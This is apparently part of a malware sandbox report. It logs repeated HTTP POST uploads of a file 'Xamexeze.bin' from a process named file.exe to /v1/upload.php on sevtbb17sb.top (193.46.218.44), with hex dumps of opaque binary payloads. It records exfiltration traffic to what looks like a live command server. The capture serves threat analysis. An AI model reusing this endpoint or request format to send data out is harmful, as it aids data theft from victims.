Oct 20, 2024 15:25:27.941483021 CEST	1236	OUT	Data Raw: c3 6d 67 6d 20 90 47 8c aa 73 16 da bc 7d b8 2b f8 01 ea 6c 67 66 9a 6c ab 66 56 0b db f3 fe 0f b5 12 0e 9e fa ca 79 c5 09 a6 28 a2 af ae 18 d0 e7 b8 2c 98 a1 66 68 07 10 4e 6f 2f 4c a0 32 f6 58 83 55 22 98 d8 8f 86 f0 02 d2 b0 36 37 1c 34 e0 ce Data Ascii: mgm Gs}+lgflfVy(,fhNo/L2XU"674MRQ6&cWM};X_X%)9\|lt@48Tqb[CGn\|t+P1_ e4OzHlt-G<jg$fJ46
Oct 20, 2024 15:25:27.941505909 CEST	2472	OUT	Data Raw: f2 47 35 56 d9 59 6d 1b 6d 87 64 12 e1 f9 14 f7 a9 61 f7 1c 02 78 ae cd e9 7a 5e f0 af b2 51 e4 42 98 07 5f 9e 23 11 4f b9 92 09 92 83 36 30 57 10 86 96 81 6e b0 6e d2 1b 10 27 8c ac 82 b6 86 b1 5f 3f 8e 2e eb ae 9a ae 8e a4 e2 4d 8d 3c 42 eb 91 Data Ascii: G5VYmmdaxz^QB_#O60Wnn'_?.M<Bo]-L"I0I$$pBk}dFUA2R;P.U]JsR4_7G!M8={^bF_sl{c]Bsuo/&A?8OB/ZO!,3k
Oct 20, 2024 15:25:27.941622019 CEST	4944	OUT	Data Raw: 4a e7 cc 50 d0 ed 0d 6d a8 37 f1 5e f2 d2 1f 60 a6 c5 52 d6 9a 70 17 e4 79 80 fb e4 29 ab cd 69 52 8a 2b 47 73 ff b9 96 ea 1f e5 20 89 c5 de 4e f9 cb 17 5d 60 3b ac cd 87 62 7f b4 87 13 9c e8 f8 36 78 3c de 9a f8 ca 93 a1 d6 be bf 2f 59 02 fd 8b Data Ascii: JPm7^`Rpy)iR+Gs N]`;b6x</Y#.#[6d!l<A-m 9s^Xz] Dz\U/;F2Q}s>V*O$R$r8\|,("fC48!(h_FM!2bs\rS
Oct 20, 2024 15:25:27.941654921 CEST	2472	OUT	Data Raw: a0 68 40 21 e3 95 43 db ff 3b 1e 3a 52 b3 6e 39 cb fb a0 c6 a1 dd 11 98 68 64 50 9f 34 d6 14 53 c3 cd 76 b0 b0 f4 1c 9f f2 e6 74 01 a5 38 22 d0 2e c3 9c b7 07 48 3d 58 c9 65 2a fe 27 1d bd 2f e0 f6 1e 0f e5 a6 df f3 fc 5c 7e 92 21 63 44 a7 7d c5 Data Ascii: h@!C;:Rn9hdP4Svt8".H=Xe*'/\~!cD},p04`2ump6=^uU@s])fUS},;1BfD@h~'B3@aaw$'s#:
Oct 20, 2024 15:25:27.941680908 CEST	2472	OUT	Data Raw: e7 06 0a 6a 7e e1 d5 15 84 27 34 fe 2f 2e 9d 38 b7 8c 8e a8 22 9b d4 d9 88 a2 ff 18 25 67 2c eb bc 86 24 37 7a 29 b8 17 fb aa 85 ef ac f0 a7 d8 15 ad a8 25 4a c2 08 be 60 30 8f db b8 48 b2 a3 68 18 2b 1f b7 08 78 fc 37 4d 4f 7e ce 63 8b 5f ab 31 Data Ascii: j~'4/.8"%g,$7z)%J`0Hh+x7MO~c_16M4eOwW#CZ\|3h"kh5xp+@Z3yR Q8*4`sp!M2@__G^dn:S@PIKqKH=e
Oct 20, 2024 15:25:27.941795111 CEST	2784	OUT	Data Raw: de a6 f6 86 54 e0 9e 0e f3 98 dd 08 fd 02 81 c1 79 8b 45 de 7f ee 83 2c 77 54 85 11 f7 01 8c 30 c5 7b e5 78 1d 7f 21 92 24 4a f0 54 fa d3 82 d4 76 1a 97 a5 35 be 07 a0 12 0e bd 7a d9 14 fa b3 d6 70 12 2c 0b 41 4f 8c 3b 2d a5 d5 ef 39 35 50 88 c8 Data Ascii: TyE,wT0{x!$JTv5zp,AO;-95PchA%eQ7FM_i.!IOe+Aym\|{}AXPg6.$rPIp00SwWnni-1v$C&@%2Bg`;N-l6"k8M</f-!)5]-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49752	193.46.218.44	80	7472	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 15:25:29.561624050 CEST	335	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary15133046 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 27504 Host: sevtbb17sb.top
Oct 20, 2024 15:25:29.561682940 CEST	11124	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 31 35 31 33 33 30 34 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 58 61 6d Data Ascii: ------Boundary15133046Content-Disposition: form-data; name="file"; filename="Xamexeze.bin"Content-Type: application/octet-stream`v*BxH/s=Kp~veUs$<[j}lAbGz63n!#Dz""1\|
Oct 20, 2024 15:25:29.566575050 CEST	1236	OUT	Data Raw: c3 6d 67 6d 20 90 47 8c aa 73 16 da bc 7d b8 2b f8 01 ea 6c 67 66 9a 6c ab 66 56 0b db f3 fe 0f b5 12 0e 9e fa ca 79 c5 09 a6 28 a2 af ae 18 d0 e7 b8 2c 98 a1 66 68 07 10 4e 6f 2f 4c a0 32 f6 58 83 55 22 98 d8 8f 86 f0 02 d2 b0 36 37 1c 34 e0 ce Data Ascii: mgm Gs}+lgflfVy(,fhNo/L2XU"674MRQ6&cWM};X_X%)9\|lt@48Tqb[CGn\|t+P1_ e4OzHlt-G<jg$fJ46
Oct 20, 2024 15:25:29.566652060 CEST	2472	OUT	Data Raw: f2 47 35 56 d9 59 6d 1b 6d 87 64 12 e1 f9 14 f7 a9 61 f7 1c 02 78 ae cd e9 7a 5e f0 af b2 51 e4 42 98 07 5f 9e 23 11 4f b9 92 09 92 83 36 30 57 10 86 96 81 6e b0 6e d2 1b 10 27 8c ac 82 b6 86 b1 5f 3f 8e 2e eb ae 9a ae 8e a4 e2 4d 8d 3c 42 eb 91 Data Ascii: G5VYmmdaxz^QB_#O60Wnn'_?.M<Bo]-L"I0I$$pBk}dFUA2R;P.U]JsR4_7G!M8={^bF_sl{c]Bsuo/&A?8OB/ZO!,3k
Oct 20, 2024 15:25:29.566709042 CEST	2472	OUT	Data Raw: 4a e7 cc 50 d0 ed 0d 6d a8 37 f1 5e f2 d2 1f 60 a6 c5 52 d6 9a 70 17 e4 79 80 fb e4 29 ab cd 69 52 8a 2b 47 73 ff b9 96 ea 1f e5 20 89 c5 de 4e f9 cb 17 5d 60 3b ac cd 87 62 7f b4 87 13 9c e8 f8 36 78 3c de 9a f8 ca 93 a1 d6 be bf 2f 59 02 fd 8b Data Ascii: JPm7^`Rpy)iR+Gs N]`;b6x</Y#.#[6d!l<A-m 9s^Xz] Dz\U/;F2Q}s>V*O$R$r8\|,("fC48!(h_FM!2bs\rS
Oct 20, 2024 15:25:29.566737890 CEST	2472	OUT	Data Raw: b7 70 a2 d6 02 36 14 b5 96 a3 44 29 6b 0a c5 48 6c 52 fb 38 62 ba ed ad 49 58 0b e9 d5 1e f1 ee b3 fb 74 f7 30 93 1f 92 4d 75 e7 80 c9 5e 45 01 cb 8d c0 78 d6 b7 41 c4 d4 51 c2 ab 2e d4 3b 3c ae 09 37 a2 06 03 9f 4d a2 e9 27 c5 aa e5 d2 13 ca c5 Data Ascii: p6D)kHlR8bIXt0Mu^ExAQ.;<7M'4WW=S/YCA^m;&d[<MKo)4&#m'rpe@f+Y4\"h)GQbdy}d3LW<rFd=
Oct 20, 2024 15:25:29.566765070 CEST	2472	OUT	Data Raw: a0 68 40 21 e3 95 43 db ff 3b 1e 3a 52 b3 6e 39 cb fb a0 c6 a1 dd 11 98 68 64 50 9f 34 d6 14 53 c3 cd 76 b0 b0 f4 1c 9f f2 e6 74 01 a5 38 22 d0 2e c3 9c b7 07 48 3d 58 c9 65 2a fe 27 1d bd 2f e0 f6 1e 0f e5 a6 df f3 fc 5c 7e 92 21 63 44 a7 7d c5 Data Ascii: h@!C;:Rn9hdP4Svt8".H=Xe*'/\~!cD},p04`2ump6=^uU@s])fUS},;1BfD@h~'B3@aaw$'s#:
Oct 20, 2024 15:25:29.566812992 CEST	2472	OUT	Data Raw: e7 06 0a 6a 7e e1 d5 15 84 27 34 fe 2f 2e 9d 38 b7 8c 8e a8 22 9b d4 d9 88 a2 ff 18 25 67 2c eb bc 86 24 37 7a 29 b8 17 fb aa 85 ef ac f0 a7 d8 15 ad a8 25 4a c2 08 be 60 30 8f db b8 48 b2 a3 68 18 2b 1f b7 08 78 fc 37 4d 4f 7e ce 63 8b 5f ab 31 Data Ascii: j~'4/.8"%g,$7z)%J`0Hh+x7MO~c_16M4eOwW#CZ\|3h"kh5xp+@Z3yR Q8*4`sp!M2@__G^dn:S@PIKqKH=e
Oct 20, 2024 15:25:29.566862106 CEST	2784	OUT	Data Raw: de a6 f6 86 54 e0 9e 0e f3 98 dd 08 fd 02 81 c1 79 8b 45 de 7f ee 83 2c 77 54 85 11 f7 01 8c 30 c5 7b e5 78 1d 7f 21 92 24 4a f0 54 fa d3 82 d4 76 1a 97 a5 35 be 07 a0 12 0e bd 7a d9 14 fa b3 d6 70 12 2c 0b 41 4f 8c 3b 2d a5 d5 ef 39 35 50 88 c8 Data Ascii: TyE,wT0{x!$JTv5zp,AO;-95PchA%eQ7FM_i.!IOe+Aym\|{}AXPg6.$rPIp00SwWnni-1v$C&@%2Bg`;N-l6"k8M</f-!)5]-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49754	193.46.218.44	80	7472	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 15:25:31.092425108 CEST	335	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary15133046 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 27504 Host: sevtbb17sb.top
Oct 20, 2024 15:25:31.092468977 CEST	11124	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 31 35 31 33 33 30 34 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 58 61 6d Data Ascii: ------Boundary15133046Content-Disposition: form-data; name="file"; filename="Xamexeze.bin"Content-Type: application/octet-stream`v*BxH/s=Kp~veUs$<[j}lAbGz63n!#Dz""1\|
Oct 20, 2024 15:25:31.097341061 CEST	1236	OUT	Data Raw: c3 6d 67 6d 20 90 47 8c aa 73 16 da bc 7d b8 2b f8 01 ea 6c 67 66 9a 6c ab 66 56 0b db f3 fe 0f b5 12 0e 9e fa ca 79 c5 09 a6 28 a2 af ae 18 d0 e7 b8 2c 98 a1 66 68 07 10 4e 6f 2f 4c a0 32 f6 58 83 55 22 98 d8 8f 86 f0 02 d2 b0 36 37 1c 34 e0 ce Data Ascii: mgm Gs}+lgflfVy(,fhNo/L2XU"674MRQ6&cWM};X_X%)9\|lt@48Tqb[CGn\|t+P1_ e4OzHlt-G<jg$fJ46
Oct 20, 2024 15:25:31.097364902 CEST	2472	OUT	Data Raw: f2 47 35 56 d9 59 6d 1b 6d 87 64 12 e1 f9 14 f7 a9 61 f7 1c 02 78 ae cd e9 7a 5e f0 af b2 51 e4 42 98 07 5f 9e 23 11 4f b9 92 09 92 83 36 30 57 10 86 96 81 6e b0 6e d2 1b 10 27 8c ac 82 b6 86 b1 5f 3f 8e 2e eb ae 9a ae 8e a4 e2 4d 8d 3c 42 eb 91 Data Ascii: G5VYmmdaxz^QB_#O60Wnn'_?.M<Bo]-L"I0I$$pBk}dFUA2R;P.U]JsR4_7G!M8={^bF_sl{c]Bsuo/&A?8OB/ZO!,3k
Oct 20, 2024 15:25:31.097426891 CEST	2472	OUT	Data Raw: 4a e7 cc 50 d0 ed 0d 6d a8 37 f1 5e f2 d2 1f 60 a6 c5 52 d6 9a 70 17 e4 79 80 fb e4 29 ab cd 69 52 8a 2b 47 73 ff b9 96 ea 1f e5 20 89 c5 de 4e f9 cb 17 5d 60 3b ac cd 87 62 7f b4 87 13 9c e8 f8 36 78 3c de 9a f8 ca 93 a1 d6 be bf 2f 59 02 fd 8b Data Ascii: JPm7^`Rpy)iR+Gs N]`;b6x</Y#.#[6d!l<A-m 9s^Xz] Dz\U/;F2Q}s>V*O$R$r8\|,("fC48!(h_FM!2bs\rS
Oct 20, 2024 15:25:31.097449064 CEST	2472	OUT	Data Raw: b7 70 a2 d6 02 36 14 b5 96 a3 44 29 6b 0a c5 48 6c 52 fb 38 62 ba ed ad 49 58 0b e9 d5 1e f1 ee b3 fb 74 f7 30 93 1f 92 4d 75 e7 80 c9 5e 45 01 cb 8d c0 78 d6 b7 41 c4 d4 51 c2 ab 2e d4 3b 3c ae 09 37 a2 06 03 9f 4d a2 e9 27 c5 aa e5 d2 13 ca c5 Data Ascii: p6D)kHlR8bIXt0Mu^ExAQ.;<7M'4WW=S/YCA^m;&d[<MKo)4&#m'rpe@f+Y4\"h)GQbdy}d3LW<rFd=
Oct 20, 2024 15:25:31.097482920 CEST	2472	OUT	Data Raw: a0 68 40 21 e3 95 43 db ff 3b 1e 3a 52 b3 6e 39 cb fb a0 c6 a1 dd 11 98 68 64 50 9f 34 d6 14 53 c3 cd 76 b0 b0 f4 1c 9f f2 e6 74 01 a5 38 22 d0 2e c3 9c b7 07 48 3d 58 c9 65 2a fe 27 1d bd 2f e0 f6 1e 0f e5 a6 df f3 fc 5c 7e 92 21 63 44 a7 7d c5 Data Ascii: h@!C;:Rn9hdP4Svt8".H=Xe*'/\~!cD},p04`2ump6=^uU@s])fUS},;1BfD@h~'B3@aaw$'s#:
Oct 20, 2024 15:25:31.097505093 CEST	2472	OUT	Data Raw: e7 06 0a 6a 7e e1 d5 15 84 27 34 fe 2f 2e 9d 38 b7 8c 8e a8 22 9b d4 d9 88 a2 ff 18 25 67 2c eb bc 86 24 37 7a 29 b8 17 fb aa 85 ef ac f0 a7 d8 15 ad a8 25 4a c2 08 be 60 30 8f db b8 48 b2 a3 68 18 2b 1f b7 08 78 fc 37 4d 4f 7e ce 63 8b 5f ab 31 Data Ascii: j~'4/.8"%g,$7z)%J`0Hh+x7MO~c_16M4eOwW#CZ\|3h"kh5xp+@Z3yR Q8*4`sp!M2@__G^dn:S@PIKqKH=e
Oct 20, 2024 15:25:31.097584963 CEST	2784	OUT	Data Raw: de a6 f6 86 54 e0 9e 0e f3 98 dd 08 fd 02 81 c1 79 8b 45 de 7f ee 83 2c 77 54 85 11 f7 01 8c 30 c5 7b e5 78 1d 7f 21 92 24 4a f0 54 fa d3 82 d4 76 1a 97 a5 35 be 07 a0 12 0e bd 7a d9 14 fa b3 d6 70 12 2c 0b 41 4f 8c 3b 2d a5 d5 ef 39 35 50 88 c8 Data Ascii: TyE,wT0{x!$JTv5zp,AO;-95PchA%eQ7FM_i.!IOe+Aym\|{}AXPg6.$rPIp00SwWnni-1v$C&@%2Bg`;N-l6"k8M</f-!)5]-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49755	193.46.218.44	80	7472	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 15:25:32.754556894 CEST	335	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary15133046 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 27504 Host: sevtbb17sb.top
Oct 20, 2024 15:25:32.754621029 CEST	11124	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 31 35 31 33 33 30 34 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 58 61 6d Data Ascii: ------Boundary15133046Content-Disposition: form-data; name="file"; filename="Xamexeze.bin"Content-Type: application/octet-stream`v*BxH/s=Kp~veUs$<[j}lAbGz63n!#Dz""1\|
Oct 20, 2024 15:25:32.759661913 CEST	1236	OUT	Data Raw: c3 6d 67 6d 20 90 47 8c aa 73 16 da bc 7d b8 2b f8 01 ea 6c 67 66 9a 6c ab 66 56 0b db f3 fe 0f b5 12 0e 9e fa ca 79 c5 09 a6 28 a2 af ae 18 d0 e7 b8 2c 98 a1 66 68 07 10 4e 6f 2f 4c a0 32 f6 58 83 55 22 98 d8 8f 86 f0 02 d2 b0 36 37 1c 34 e0 ce Data Ascii: mgm Gs}+lgflfVy(,fhNo/L2XU"674MRQ6&cWM};X_X%)9\|lt@48Tqb[CGn\|t+P1_ e4OzHlt-G<jg$fJ46
Oct 20, 2024 15:25:32.759706020 CEST	2472	OUT	Data Raw: f2 47 35 56 d9 59 6d 1b 6d 87 64 12 e1 f9 14 f7 a9 61 f7 1c 02 78 ae cd e9 7a 5e f0 af b2 51 e4 42 98 07 5f 9e 23 11 4f b9 92 09 92 83 36 30 57 10 86 96 81 6e b0 6e d2 1b 10 27 8c ac 82 b6 86 b1 5f 3f 8e 2e eb ae 9a ae 8e a4 e2 4d 8d 3c 42 eb 91 Data Ascii: G5VYmmdaxz^QB_#O60Wnn'_?.M<Bo]-L"I0I$$pBk}dFUA2R;P.U]JsR4_7G!M8={^bF_sl{c]Bsuo/&A?8OB/ZO!,3k
Oct 20, 2024 15:25:32.759752989 CEST	4944	OUT	Data Raw: 4a e7 cc 50 d0 ed 0d 6d a8 37 f1 5e f2 d2 1f 60 a6 c5 52 d6 9a 70 17 e4 79 80 fb e4 29 ab cd 69 52 8a 2b 47 73 ff b9 96 ea 1f e5 20 89 c5 de 4e f9 cb 17 5d 60 3b ac cd 87 62 7f b4 87 13 9c e8 f8 36 78 3c de 9a f8 ca 93 a1 d6 be bf 2f 59 02 fd 8b Data Ascii: JPm7^`Rpy)iR+Gs N]`;b6x</Y#.#[6d!l<A-m 9s^Xz] Dz\U/;F2Q}s>V*O$R$r8\|,("fC48!(h_FM!2bs\rS
Oct 20, 2024 15:25:32.759823084 CEST	2472	OUT	Data Raw: a0 68 40 21 e3 95 43 db ff 3b 1e 3a 52 b3 6e 39 cb fb a0 c6 a1 dd 11 98 68 64 50 9f 34 d6 14 53 c3 cd 76 b0 b0 f4 1c 9f f2 e6 74 01 a5 38 22 d0 2e c3 9c b7 07 48 3d 58 c9 65 2a fe 27 1d bd 2f e0 f6 1e 0f e5 a6 df f3 fc 5c 7e 92 21 63 44 a7 7d c5 Data Ascii: h@!C;:Rn9hdP4Svt8".H=Xe*'/\~!cD},p04`2ump6=^uU@s])fUS},;1BfD@h~'B3@aaw$'s#:
Oct 20, 2024 15:25:32.759860992 CEST	2472	OUT	Data Raw: e7 06 0a 6a 7e e1 d5 15 84 27 34 fe 2f 2e 9d 38 b7 8c 8e a8 22 9b d4 d9 88 a2 ff 18 25 67 2c eb bc 86 24 37 7a 29 b8 17 fb aa 85 ef ac f0 a7 d8 15 ad a8 25 4a c2 08 be 60 30 8f db b8 48 b2 a3 68 18 2b 1f b7 08 78 fc 37 4d 4f 7e ce 63 8b 5f ab 31 Data Ascii: j~'4/.8"%g,$7z)%J`0Hh+x7MO~c_16M4eOwW#CZ\|3h"kh5xp+@Z3yR Q8*4`sp!M2@__G^dn:S@PIKqKH=e
Oct 20, 2024 15:25:32.759927034 CEST	2784	OUT	Data Raw: de a6 f6 86 54 e0 9e 0e f3 98 dd 08 fd 02 81 c1 79 8b 45 de 7f ee 83 2c 77 54 85 11 f7 01 8c 30 c5 7b e5 78 1d 7f 21 92 24 4a f0 54 fa d3 82 d4 76 1a 97 a5 35 be 07 a0 12 0e bd 7a d9 14 fa b3 d6 70 12 2c 0b 41 4f 8c 3b 2d a5 d5 ef 39 35 50 88 c8 Data Ascii: TyE,wT0{x!$JTv5zp,AO;-95PchA%eQ7FM_i.!IOe+Aym\|{}AXPg6.$rPIp00SwWnni-1v$C&@%2Bg`;N-l6"k8M</f-!)5]-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49756	193.46.218.44	80	7472	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 15:25:34.155106068 CEST	335	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary15133046 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 27504 Host: sevtbb17sb.top
Oct 20, 2024 15:25:34.155153036 CEST	11124	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 31 35 31 33 33 30 34 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 58 61 6d Data Ascii: ------Boundary15133046Content-Disposition: form-data; name="file"; filename="Xamexeze.bin"Content-Type: application/octet-stream`v*BxH/s=Kp~veUs$<[j}lAbGz63n!#Dz""1\|
Oct 20, 2024 15:25:34.159965992 CEST	1236	OUT	Data Raw: c3 6d 67 6d 20 90 47 8c aa 73 16 da bc 7d b8 2b f8 01 ea 6c 67 66 9a 6c ab 66 56 0b db f3 fe 0f b5 12 0e 9e fa ca 79 c5 09 a6 28 a2 af ae 18 d0 e7 b8 2c 98 a1 66 68 07 10 4e 6f 2f 4c a0 32 f6 58 83 55 22 98 d8 8f 86 f0 02 d2 b0 36 37 1c 34 e0 ce Data Ascii: mgm Gs}+lgflfVy(,fhNo/L2XU"674MRQ6&cWM};X_X%)9\|lt@48Tqb[CGn\|t+P1_ e4OzHlt-G<jg$fJ46
Oct 20, 2024 15:25:34.160073996 CEST	2472	OUT	Data Raw: f2 47 35 56 d9 59 6d 1b 6d 87 64 12 e1 f9 14 f7 a9 61 f7 1c 02 78 ae cd e9 7a 5e f0 af b2 51 e4 42 98 07 5f 9e 23 11 4f b9 92 09 92 83 36 30 57 10 86 96 81 6e b0 6e d2 1b 10 27 8c ac 82 b6 86 b1 5f 3f 8e 2e eb ae 9a ae 8e a4 e2 4d 8d 3c 42 eb 91 Data Ascii: G5VYmmdaxz^QB_#O60Wnn'_?.M<Bo]-L"I0I$$pBk}dFUA2R;P.U]JsR4_7G!M8={^bF_sl{c]Bsuo/&A?8OB/ZO!,3k
Oct 20, 2024 15:25:34.160131931 CEST	4944	OUT	Data Raw: 4a e7 cc 50 d0 ed 0d 6d a8 37 f1 5e f2 d2 1f 60 a6 c5 52 d6 9a 70 17 e4 79 80 fb e4 29 ab cd 69 52 8a 2b 47 73 ff b9 96 ea 1f e5 20 89 c5 de 4e f9 cb 17 5d 60 3b ac cd 87 62 7f b4 87 13 9c e8 f8 36 78 3c de 9a f8 ca 93 a1 d6 be bf 2f 59 02 fd 8b Data Ascii: JPm7^`Rpy)iR+Gs N]`;b6x</Y#.#[6d!l<A-m 9s^Xz] Dz\U/;F2Q}s>V*O$R$r8\|,("fC48!(h_FM!2bs\rS
Oct 20, 2024 15:25:34.160186052 CEST	2472	OUT	Data Raw: a0 68 40 21 e3 95 43 db ff 3b 1e 3a 52 b3 6e 39 cb fb a0 c6 a1 dd 11 98 68 64 50 9f 34 d6 14 53 c3 cd 76 b0 b0 f4 1c 9f f2 e6 74 01 a5 38 22 d0 2e c3 9c b7 07 48 3d 58 c9 65 2a fe 27 1d bd 2f e0 f6 1e 0f e5 a6 df f3 fc 5c 7e 92 21 63 44 a7 7d c5 Data Ascii: h@!C;:Rn9hdP4Svt8".H=Xe*'/\~!cD},p04`2ump6=^uU@s])fUS},;1BfD@h~'B3@aaw$'s#:
Oct 20, 2024 15:25:34.160244942 CEST	5256	OUT	Data Raw: e7 06 0a 6a 7e e1 d5 15 84 27 34 fe 2f 2e 9d 38 b7 8c 8e a8 22 9b d4 d9 88 a2 ff 18 25 67 2c eb bc 86 24 37 7a 29 b8 17 fb aa 85 ef ac f0 a7 d8 15 ad a8 25 4a c2 08 be 60 30 8f db b8 48 b2 a3 68 18 2b 1f b7 08 78 fc 37 4d 4f 7e ce 63 8b 5f ab 31 Data Ascii: j~'4/.8"%g,$7z)%J`0Hh+x7MO~c_16M4eOwW#CZ\|3h"kh5xp+@Z3yR Q8*4`sp!M2@__G^dn:S@PIKqKH=e

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49757	193.46.218.44	80	7472	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 15:25:35.733680964 CEST	335	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary15133046 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 27504 Host: sevtbb17sb.top
Oct 20, 2024 15:25:35.733731985 CEST	11124	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 31 35 31 33 33 30 34 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 58 61 6d Data Ascii: ------Boundary15133046Content-Disposition: form-data; name="file"; filename="Xamexeze.bin"Content-Type: application/octet-stream`v*BxH/s=Kp~veUs$<[j}lAbGz63n!#Dz""1\|
Oct 20, 2024 15:25:35.738580942 CEST	1236	OUT	Data Raw: c3 6d 67 6d 20 90 47 8c aa 73 16 da bc 7d b8 2b f8 01 ea 6c 67 66 9a 6c ab 66 56 0b db f3 fe 0f b5 12 0e 9e fa ca 79 c5 09 a6 28 a2 af ae 18 d0 e7 b8 2c 98 a1 66 68 07 10 4e 6f 2f 4c a0 32 f6 58 83 55 22 98 d8 8f 86 f0 02 d2 b0 36 37 1c 34 e0 ce Data Ascii: mgm Gs}+lgflfVy(,fhNo/L2XU"674MRQ6&cWM};X_X%)9\|lt@48Tqb[CGn\|t+P1_ e4OzHlt-G<jg$fJ46
Oct 20, 2024 15:25:35.738684893 CEST	2472	OUT	Data Raw: f2 47 35 56 d9 59 6d 1b 6d 87 64 12 e1 f9 14 f7 a9 61 f7 1c 02 78 ae cd e9 7a 5e f0 af b2 51 e4 42 98 07 5f 9e 23 11 4f b9 92 09 92 83 36 30 57 10 86 96 81 6e b0 6e d2 1b 10 27 8c ac 82 b6 86 b1 5f 3f 8e 2e eb ae 9a ae 8e a4 e2 4d 8d 3c 42 eb 91 Data Ascii: G5VYmmdaxz^QB_#O60Wnn'_?.M<Bo]-L"I0I$$pBk}dFUA2R;P.U]JsR4_7G!M8={^bF_sl{c]Bsuo/&A?8OB/ZO!,3k
Oct 20, 2024 15:25:35.738818884 CEST	2472	OUT	Data Raw: 4a e7 cc 50 d0 ed 0d 6d a8 37 f1 5e f2 d2 1f 60 a6 c5 52 d6 9a 70 17 e4 79 80 fb e4 29 ab cd 69 52 8a 2b 47 73 ff b9 96 ea 1f e5 20 89 c5 de 4e f9 cb 17 5d 60 3b ac cd 87 62 7f b4 87 13 9c e8 f8 36 78 3c de 9a f8 ca 93 a1 d6 be bf 2f 59 02 fd 8b Data Ascii: JPm7^`Rpy)iR+Gs N]`;b6x</Y#.#[6d!l<A-m 9s^Xz] Dz\U/;F2Q}s>V*O$R$r8\|,("fC48!(h_FM!2bs\rS
Oct 20, 2024 15:25:35.738838911 CEST	2472	OUT	Data Raw: b7 70 a2 d6 02 36 14 b5 96 a3 44 29 6b 0a c5 48 6c 52 fb 38 62 ba ed ad 49 58 0b e9 d5 1e f1 ee b3 fb 74 f7 30 93 1f 92 4d 75 e7 80 c9 5e 45 01 cb 8d c0 78 d6 b7 41 c4 d4 51 c2 ab 2e d4 3b 3c ae 09 37 a2 06 03 9f 4d a2 e9 27 c5 aa e5 d2 13 ca c5 Data Ascii: p6D)kHlR8bIXt0Mu^ExAQ.;<7M'4WW=S/YCA^m;&d[<MKo)4&#m'rpe@f+Y4\"h)GQbdy}d3LW<rFd=
